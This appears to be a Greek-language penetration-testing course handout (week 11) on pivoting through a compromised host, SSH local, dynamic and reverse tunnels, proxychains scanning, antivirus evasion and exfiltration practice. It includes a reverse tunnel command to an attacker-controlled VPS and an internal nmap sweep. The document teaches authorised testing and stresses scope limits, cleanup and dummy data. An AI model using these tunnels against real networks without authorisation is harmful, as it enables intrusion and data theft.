Εβδομάδα 11 — Πλευρικές μετακινήσεις και εξαγωγή δεδομένων
Παιδαγωγικοί στόχοι
- Χρήση ενός παραβιασμένου κεντρικού υπολογιστή ως pivot προς ένα εσωτερικό τμήμα δικτύου.
- Δημιουργία σταθερών, αναστρέψιμων, καταγράψιμων σηράγγων SSH.
- Κατανόηση της αποφυγής antivirus χωρίς να γίνεται αυτοσκοπός.
Το pivot σε μία φράση
Ένα pivot μετατρέπει τον παραβιασμένο κεντρικό υπολογιστή σε αναμεταδότη. Χωρίς pivot, η εσωτερική αναγνώριση είναι αδύνατη από τα έξω.
Τρεις τεχνικές σήραγγας
# Τοπική ανακατεύθυνση: ο σταθμός του επιτιθέμενου εκθέτει μια θύρα που φτάνει σε μια εσωτερική υπηρεσία.
ssh -L 8080:10.1.1.20:80 utilisateur@pivot
# Δυναμική ανακατεύθυνση: SOCKS5 στην πλευρά του επιτιθέμενου, όλη η κίνηση βγαίνει από το pivot.
ssh -D 1080 utilisateur@pivot
# Αντίστροφη ανακατεύθυνση: ο στόχος συνδέεται προς εσάς. Χρήσιμο πίσω από NAT.
ssh -R 4444:localhost:22 attaquant@vps
Χρήση με Proxychains:
# /etc/proxychains.conf
socks5 127.0.0.1 1080
proxychains -q nmap -sT -Pn 10.1.1.0/24
Υπεύθυνη εσωτερική αναγνώριση
Σε ένα εσωτερικό δίκτυο, μια επιθετική σάρωση διακόπτει υπηρεσίες (εκτυπωτές, αυτόματα). Κατεβάστε
σε -T2, περιοριστείτε στις θύρες που είναι σχετικές με τον στόχο, ποτέ μη σαρώνετε ολόκληρο ένα
βιομηχανικό τμήμα δικτύου χωρίς ρητή εξουσιοδότηση στο RoE.
Αποφυγή antivirus — Τι πρέπει να γνωρίζετε
Η αποφυγή είναι ένα πεδίο που μεταβάλλεται συνεχώς. Αυτό που μετράει σε επαγγελματικό pentest:
- Τεκμηρίωση των τεχνικών που δοκιμάστηκαν: η αξία για τον πελάτη είναι να γνωρίζει τι εντοπίστηκε, όχι μόνο τι λειτούργησε.
- Μην αφήνετε μόνιμο φορτίο χωρίς ρητή εξουσιοδότηση: αυτό είναι μια σχεδόν πάντα κόκκινη γραμμή του RoE.
- Καθαρισμός κάθε κεντρικού υπολογιστή στο τέλος ενός τεστ: αρχεία, λογαριασμοί, προγραμματισμένες εργασίες.
Εξαγωγή δεδομένων
Ο κανόνας: εξαγωγή ψεύτικων δεδομένων για την απόδειξη του καναλιού, ποτέ πραγματικών δεδομένων
του πελάτη. Ένα κρυπτογραφημένο και χρονοσημασμένο αρχείο PROOF_OF_EXFIL_2026-08-08.txt αρκεί για την
επίδειξη.